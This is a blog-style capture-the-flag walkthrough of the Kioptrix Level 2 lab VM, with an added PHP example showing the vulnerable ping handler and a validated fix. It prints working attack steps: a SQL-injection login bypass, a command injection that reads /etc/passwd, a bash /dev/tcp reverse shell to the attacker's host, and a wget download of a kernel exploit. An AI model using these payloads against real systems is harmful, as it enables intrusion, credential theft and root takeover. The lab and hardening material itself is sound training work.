[Hacking series] – Kioptrix level 2

Written on June 6, 2015

Code name: Kioptrix2

Webpage: http://kioptrix.com/

VM Download: http://www.kioptrix.com/blog/dlvm/Kioptrix_Level_2.rar

Challenge: Get root on the system

After booting the box, we can find it with netdiscover and scan it with nmap:

# nmap -Pn -A -p- 192.168.11.13

The nmap scan gave us the following:

Open ports: 22, 80, 111, 443, 631, 778, 3306

In these boxes port 80 is always an interesting port, so let’s see what’s hiding there.

It’s an HTML/PHP-based web login form. We tried a few SQL injection strings and methods to bypass the login, and got this one working in the Username field:

Administrator' or 1=1 #

Then we moved on to a “pingit” style page.

It looks like we can use this page to ping an IP on the network. How will PHP do that? Will it use a PHP function like shell_exec()? Let’s see if we can inject something into it:

127.0.0.1; cat /etc/passwd
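Why the `;` gets through, and how the page could be fixed, shown as an added example that is not the VM's actual source. The function names and the `ping -c 3` command line are assumptions made for illustration.

```php
<?php
// Added example: a hypothetical reconstruction of the "pingit" handler,
// not code taken from the Kioptrix VM.

// Vulnerable pattern: the form value is concatenated into a shell command
// line, so "127.0.0.1; cat /etc/passwd" is run by the shell as two commands.
function ping_vulnerable($ip)
{
    return shell_exec('ping -c 3 ' . $ip);
}

// Hardened pattern, step 1: accept only a syntactically valid IPv4 address.
// Anything carrying shell metacharacters (; & | $ ` space ...) fails here.
function validate_target(string $input): ?string
{
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

// Hardened pattern, step 2: pass the validated value as one quoted argument.
// escapeshellarg() is defence in depth on top of the validation.
function ping_hardened(string $input): string
{
    $ip = validate_target($input);
    if ($ip === null) {
        return 'Invalid IP address';
    }
    $out = shell_exec('ping -c 3 ' . escapeshellarg($ip));
    return is_string($out) ? $out : 'ping failed';
}

// Constructed sample inputs: only the validation step is exercised here,
// so the script runs offline without sending any packets.
$samples = [
    '127.0.0.1',
    '127.0.0.1; cat /etc/passwd',
    '127.0.0.1 && id',
    '$(id)',
];
foreach ($samples as $sample) {
    $verdict = validate_target($sample) === null ? 'rejected' : 'accepted';
    printf("%-30s => %s\n", $sample, $verdict);
}
```

Only the first sample is accepted; the other three are rejected before any command line is built.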

Nice. After that, we can try to inject a reverse shell command. As netcat doesn’t seem to be on the system, we can try to use bash itself.

On our Kali box:

# nc -lvp 9922

On the command form:

127.0.0.1;bash -i >& /dev/tcp/192.168.11.5/9922 0>&1

We are in. The next step is to exploit the box. As the system seems to be outdated, we will try to exploit the kernel.

# uname -a

After some quick research, we found this on the Exploit Database: https://www.exploit-db.com/exploits/9542/

We can compile the exploit on our Kali box, then send it to the target box via HTTP (wget):

# wget http://192.168.11.5/ring0

And after running that…

Game over kioptrix2 P-)

 
